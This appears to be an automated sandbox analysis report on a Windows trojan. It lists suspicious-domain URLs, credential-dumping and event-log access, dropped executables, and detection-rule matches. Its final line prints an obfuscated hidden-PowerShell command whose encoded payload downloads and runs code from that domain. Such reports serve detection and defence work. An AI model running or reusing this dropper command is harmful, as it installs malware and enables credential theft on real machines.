      Source: powershell.exe, 0000000A.00000002.3583871028.000001EE64D2F000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B2C1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000000.3297685999.00007FF78B2C1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EA248000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
      Source: powershell.exe, 00000015.00000002.3350768794.000001DF11C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3348440701.0000017A90198000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3348440701.0000017A90486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000002.00000002.3120002105.0000023D3C4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2974080588.0000022EF72B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF12754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3614783990.000001DF212D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3614783990.000001DF21417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE55016000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE56393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/D
      Source: svczHost.exe, 00000011.00000002.4141517755.00000179E98A7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/StaticFile/RdpService/32
      Source: svczHost.exe, 00000011.00000002.4141517755.00000179E98A7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/StaticFile/RdpService/32h
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2DD82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d751
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2DD82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2DDA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3055105541.0000023D2E74A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321183b73b823
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C81F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211874eaf2d7
      Source: powershell.exe, 0000000A.00000002.3324253534.000001EE55053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE56393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e9
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C81F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118fe714ca0
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2DDA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file
      Source: powershell.exe, 0000000A.00000002.3324253534.000001EE55053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec46903b0dfb975b9987fd6729e67c891c4b329
      Source: powershell.exe, 0000000A.00000002.3324253534.000001EE54C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE54EBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/67f0828de55a7b0ae4143def41be5826e35728fe516a68fd7776f4f474689bc6ab
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2DDA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/775e5047ced9e7adcec83e62ab773682b1856875a6cad7da93c53afaf38114a980
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C81F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/93f36e811e874b78005b821ed94567028efd4af63744edf59ae10ea6014e493f11
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2DDA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c863024
      Source: powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33a1
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C81F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/df74c18f34c2e710d864267392a9e7dd536421db41569695baf1b4e12a83cfb137
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C81F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file3/0e8334e27730f66442615276cd9b2fc8cf5e6a24376c7dc468f7998d07140480f5
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49754 version: TLS 1.2

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Reads the Security eventlog
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\RdpService
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Reads the System eventlog
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\myRdpService
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\myRdpService
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\RdpService
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\RdpService

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: amsi64_4780.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: 42.2.myRdpService.exe.7ff6b8660000.0.unpack, type: UNPACKEDPEMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
      Source: 0000002A.00000002.4144371245.00007FF6B8B66000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
      Source: Process Memory Space: powershell.exe PID: 7944, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: svczHost.exe PID: 5060, type: MEMORYSTRMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
      Source: Process Memory Space: myRdpService.exe PID: 7080, type: MEMORYSTRMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
      Powershell drops PE file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\fileJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF21FFBC2_2_00007FFCCF21FFBC
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF21F20C2_2_00007FFCCF21F20C
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF220F702_2_00007FFCCF220F70
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF21ED0C2_2_00007FFCCF21ED0C
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF2213002_2_00007FFCCF221300
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFCCF234E6B6_2_00007FFCCF234E6B
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFCCF2310EC10_2_00007FFCCF2310EC
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFCCF2077EC21_2_00007FFCCF2077EC
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFCCF20859C21_2_00007FFCCF20859C
      Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\myRdpService.exe 5B570471125EA0A0E5E693AB8493381A59E08C909472B461A9B1FF007CD1BB12
      Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\svczHost.exe 41310862773697FF00306B143FFDA60C87D2EA4E44774289F1F2ED0E74D2CF1B
      Source: svczHost.exe.10.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3691
      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3644
      Source: C:\Windows\Temp\svczHost.exeProcess created: Commandline size = 2904
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3691Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3644Jump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: Commandline size = 2904
      Source: amsi64_4780.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: 42.2.myRdpService.exe.7ff6b8660000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
      Source: 0000002A.00000002.4144371245.00007FF6B8B66000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
      Source: Process Memory Space: powershell.exe PID: 7944, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: svczHost.exe PID: 5060, type: MEMORYSTRMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
      Source: Process Memory Space: myRdpService.exe PID: 7080, type: MEMORYSTRMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
      Source: classification engineClassification label: mal100.troj.expl.evad.winLNK@77/118@2/5
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/publication/350074388_media_buying_for_digital_marketing?enrichid=rgreq-45e8a82d93c7bee0fc128ff405fad003-xxx&enrichsource=y292zxjqywdlozm1mda3ndm4odtbuzoxmdaxnjcznjcznjg3mdqxqde2mtu4mjkwmji3otg%3d&el=1_x_3&_esc=publicationcoverpdf
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/keren-obara?enrichid=rgreq-45e8a82d93c7bee0fc128ff405fad003-xxx&enrichsource=y292zxjqywdlozm1mda3ndm4odtbuzoxmdaxnjcznjcznjg3mdqxqde2mtu4mjkwmji3otg%3d&el=1_x_5&_esc=publicationcoverpdf
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.thebalancesmb.com/purpose-and-elements-of-a-situational-analysis-2295754
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://mediatool.com/2018/04/18/a-beginner-s-guide-to-media-planning-buying
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/keren-obara?enrichid=rgreq-45e8a82d93c7bee0fc128ff405fad003-xxx&enrichsource=y292zxjqywdlozm1mda3ndm4odtbuzoxmdaxnjcznjcznjg3mdqxqde2mtu4mjkwmji3otg%3d&el=1_x_4&_esc=publicationcoverpdf
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.wearemarketing.com/blog/a-step-by-step-guide-to-structuring-a-digital-marketing-plan.html
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/Keren-Obara?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_4&_esc=publicationCoverPdf
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/publication/350074388_MEDIA_BUYING_FOR_DIGITAL_MARKETING?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_2&_esc=publicationCoverPdf
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.obicreative.com/media-buying-and-planning/
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/Keren-Obara?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_5&_esc=publicationCoverPdf
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/Keren-Obara?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_7&_esc=publicationCoverPdf
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/publication/350074388_MEDIA_BUYING_FOR_DIGITAL_MARKETING?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_3&_esc=publicationCoverPdf
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/keren-obara?enrichid=rgreq-45e8a82d93c7bee0fc128ff405fad003-xxx&enrichsource=y292zxjqywdlozm1mda3ndm4odtbuzoxmdaxnjcznjcznjg3mdqxqde2mtu4mjkwmji3otg%3d&el=1_x_10&_esc=publicationcoverpdf
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/keren-obara?enrichid=rgreq-45e8a82d93c7bee0fc128ff405fad003-xxx&enrichsource=y292zxjqywdlozm1mda3ndm4odtbuzoxmdaxnjcznjcznjg3mdqxqde2mtu4mjkwmji3otg%3d&el=1_x_7&_esc=publicationcoverpdf
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/Keren-Obara?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_10&_esc=publicationCoverPdf
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/publication/350074388_media_buying_for_digital_marketing?enrichid=rgreq-45e8a82d93c7bee0fc128ff405fad003-xxx&enrichsource=y292zxjqywdlozm1mda3ndm4odtbuzoxmdaxnjcznjcznjg3mdqxqde2mtu4mjkwmji3otg%3d&el=1_x_2&_esc=publicationcoverpdf
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/?enrichid=rgreq-45e8a82d93c7bee0fc128ff405fad003-xxx&enrichsource=y292zxjqywdlozm1mda3ndm4odtbuzoxmdaxnjcznjcznjg3mdqxqde2mtu4mjkwmji3otg%3d&el=1_x_1&_esc=publicationcoverpdf
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_1&_esc=publicationCoverPdf
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/publication/350074388
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1224:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3552:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6392:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1224:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2928:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6836:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2468:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6392:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4332:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3552:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2468:304:WilStaging_02
      Source: C:\Windows\Temp\myRdpService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8564:304:WilStaging_02
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7244:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2928:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8752:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\STARTUAC
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7244:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8564:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6836:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8752:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4332:304:WilStaging_02
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1e1lii4.4h2.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
      Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit
